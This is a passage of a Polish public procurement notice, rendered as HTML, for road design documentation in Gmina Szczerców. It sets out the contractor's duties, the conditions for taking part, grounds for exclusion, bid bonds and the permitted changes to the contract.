producentów. Niezastosowanie się do niniejszego skutkować będzie potraktowanie przez Zamawiającego wykonanej dokumentacji projektowej jako niezgodna z umową i wezwanie do doprowadzenia przedmiotu umowy do stanu zgodnego z zawartą umową.17. Pełnienie nadzoru autorskiego podczas wykonywania robót objętych projektem. 18. Wykonanie dokumentacji projektowej w sposób umożliwiający zrealizowanie zamierzenia z uwzględnieniem rodzaju i asortymentu materiałów koniecznych do wbudowania i uzyskania najwyższej jakości infrastruktury w oparciu o obowiązujące w tym zakresie normy i przepisy szczegółowe z Ustawą prawo zamówień publicznych włącznie. 19. Pozyskanie niezbędnych decyzji administracyjnych wymaganych przepisami szczegółowymi, wszystkich niezbędnych opinii, uzgodnień i pozwoleń leży po stronie Jednostki projektowania,20. Niezwłoczne udzielanie odpowiedzi i wyjaśnień dotyczących dokumentacji projektowej w trakcie prowadzonego przez Zamawiającego postępowania przetargowego na wyłonienie Wykonawcy robót budowlanych.21. Uczestnictwo w naradach koordynacyjnych na etapie prac projektowych i jeżeli będzie taka konieczność na etapie realizacji inwestycji na wezwanie Zamawiającego bez dodatkowego wynagrodzenia.22. Uzupełnianie dokumentacji projektowej w zakresie związanym z ewentualnymi brakami wcześniej wykonanej dokumentacji oraz wyjaśnienie wątpliwości powstałych w toku realizacji inwestycji.23. Wprowadzanie do dokumentacji wszelkich zmian, jeżeli wynikają one z wad opracowań przygotowanych przez Jednostkę projektowania lub osoby, którymi się posługuje.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71220000-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp: Zamawiający przewiduje możliwość udzielenia zamówień podobnych, na podstawie art. 67 ust. 1 pkt 6 ustawy PZP, polegającą na tym, że w okresie 3 lat od dnia udzielenia niniejszego zamówienia publicznego, udzieli ewentualnie wyłonionemu w tym postępowaniu Wykonawcy zamówienia polegającego na powtórzeniu podobnych usług na terenie objętym przedmiotem zamówienia , tj. na obszarze Gminy Szczerców do 80 % wartości szacunkowej zamówienia podstawowego, co zostało skalkulowane przy szacowaniu wartości zamówienia podstawowego i na warunkach przewidzianych w umowie dla postępowania i zamówienia podstawowego. Podstawowym warunkiem ewentualnego udzielenia zamówienia podobnego będzie fakt, że w ramach niniejszego zamówienia publicznego Wykonawca realizował usługę w terminie i z najwyższą starannością.;Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp: Zamawiający przewiduje możliwość udzielenia zamówień podobnych, na podstawie art. 67 ust. 1 pkt 6 ustawy PZP, polegającą na tym, że w okresie 3 lat od dnia udzielenia niniejszego zamówienia publicznego, udzieli ewentualnie wyłonionemu w tym postępowaniu Wykonawcy zamówienia polegającego na powtórzeniu podobnych usług na terenie objętym przedmiotem zamówienia , tj. na obszarze Gminy Szczerców do 80 % wartości szacunkowej zamówienia podstawowego, co zostało skalkulowane przy szacowaniu wartości zamówienia podstawowego i na warunkach przewidzianych w umowie dla postępowania i zamówienia podstawowego. Podstawowym warunkiem ewentualnego udzielenia zamówienia podobnego będzie fakt, że w ramach niniejszego zamówienia publicznego Wykonawca realizował usługę w terminie i z najwyższą starannością.;</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów . Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie złożonego oświadczenia.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej lub finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na podstawie złożonego oświadczenia. Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.Zamawiający będzie uważał ten warunek za spełniony, jeżeli :1. Wykonawca udokumentuje: dla Części 1 wykonanie głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną dokumentacje projektową budowy/rozbudowy drogi wraz z odwodnieniem o długości nie mniejszej niż 1km i wartości min. 300.000,00zł oraz uzyskał stosowne uzgodnienia, zaświadczenia i właściwe decyzje administracyjne wraz z uzyskaniem decyzji ZRID; dla Części 2- wykonanie głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną dokumentację projektową budowy/przebudowy/rozbudowy/remontu drogi wraz z odwodnieniem o długości do 1 km i wartości min. 60.000,00zł oraz uzyskał stosowne uzdgodnienia, zaświadczenia i właściwe decyzje administracyjne wraz z uzykaniem pozwolenia na budowę lub zgłoszenia budowy/robót od organu administracji architektoniczno-budowlanej .2. Wykonawca wykaże, że będzie dysponował na etapie wykonania zadania osobą posiadającą uprawnienia projektowe w specjalności drogowej.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.Zamawiający będzie uważał ten warunek za spełniony, jeżeli: Wykonawca wykaże, że będzie dysponował na etapie wykonania zadania osobą posiadającą uprawnienia projektowe w specjalności drogowej.Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.Zamawiający będzie uważał ten warunek za spełniony, jeżeli :1. Wykonawca udokumentuje: dla Części 1 wykonanie głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną dokumentacje projektową budowy/rozbudowy drogi wraz z odwodnieniem o długości nie mniejszej niż 1km i wartości min. 300.000,00zł oraz uzyskał stosowne uzgodnienia, zaświadczenia i właściwe decyzje administracyjne wraz z uzyskaniem decyzji ZRID; dla Części 2- wykonanie głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną dokumentację projektową budowy/przebudowy/rozbudowy/remontu drogi wraz z odwodnieniem o długości do 1 km i wartości min. 60.000,00zł oraz uzyskał stosowne uzdgodnienia, zaświadczenia i właściwe decyzje administracyjne wraz z uzykaniem pozwolenia na budowę lub zgłoszenia budowy/robót od organu administracji architektoniczno-budowlanej .Potwierdzenie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego. Na podstawie złożonego oświadczenia. Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Zobowiązanie podmiotów, na zdolnościach lub sytuacji których Wykonawca polega, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zadanie nr 1 - 6 000.00 złZadanie nr 2 - 3 000.00 zł</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow">0</span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow">0</span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiany mogą dotyczyć umownego terminu wykonania zamówienia z powodu:1) z przyczyn nie leżących po stronie wykonawcy w przypadku wprowadzenia zmian w dokumentacji techniczno-projektowej,2) konieczności uzyskania niemożliwych do przewidzenia przed podpisaniem umowy danych, zgód, pozwoleń osób trzecich lub właściwych organów. 3) wystąpienia niezależnych od Wykonawcy przeszkód formalno-prawnych uniemożliwiających terminowe wykonanie zamówienia,4) wystąpienia konieczności wykonania zamówienia dodatkowego do zamówienia podstawowego stanowiącego przedmiot umowy.Zmiany mogą dotyczyć zakresu przedmiotowego zamówienia w zakresie art. 23 pkt. 1 ustawy Prawo budowlane dot. zmiany w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy.2. Zmiany mogą dotyczyć zwiększenia lub zmniejszenia wynagrodzenia 